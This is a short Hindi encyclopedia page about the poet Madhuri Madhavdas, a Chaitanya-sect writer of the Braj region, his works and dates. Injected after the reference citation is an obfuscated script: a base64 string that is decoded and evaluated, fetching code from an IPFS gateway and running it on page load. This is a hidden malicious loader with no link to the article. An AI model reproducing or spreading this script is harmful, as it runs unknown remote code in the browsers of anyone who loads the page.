माधुरी माधवदास
भारत डिस्कवरी प्रस्तुति
माधुरी माधवदास (समय संवत 1650-1710) चैतन्य सम्प्रदाय के प्रसिद्ध हिन्दी कवि थे। ये ब्रज क्षेत्र में आकर वृन्दावन में निवास करने लगे थे।
- इनका एक अन्य नाम माधव दास भी था और ये कपूर खत्री थे।
- कहीं अन्यत्र से आकर ये वृंदावन के पास माधुरीकुंड पर रहने लगे और अपना उपनाम 'माधुरी' रखा।
- 'वंशीबटमाधुरी', 'केलिमाधुरी', 'उत्कंठामाधुरी' तथा 'वृंदावनमाधुरी' आदि इनकी छोटी-छोटी रचनाएँ हैं, जिनका एक संग्रह प्रकाशित हो चुका है। दो रचनाओं में संवत 1687 तथा संवत 1699 रचना काल दिया है, अत: इनका समय संवत 1650-1710 तक निश्चित रूप से माना जा सकता है।
- यह चैतन्य संप्रदाय के थे, क्योंकि सभी रचनाओं में श्री चैतन्य महाप्रभु तथा रूप सनातन की वंदना की है।[1]
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ माधुरी माधवदास (हिंदी) भारतखोज। अभिगमन तिथि: 14 सितम्बर, 2015।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
संबंधित लेख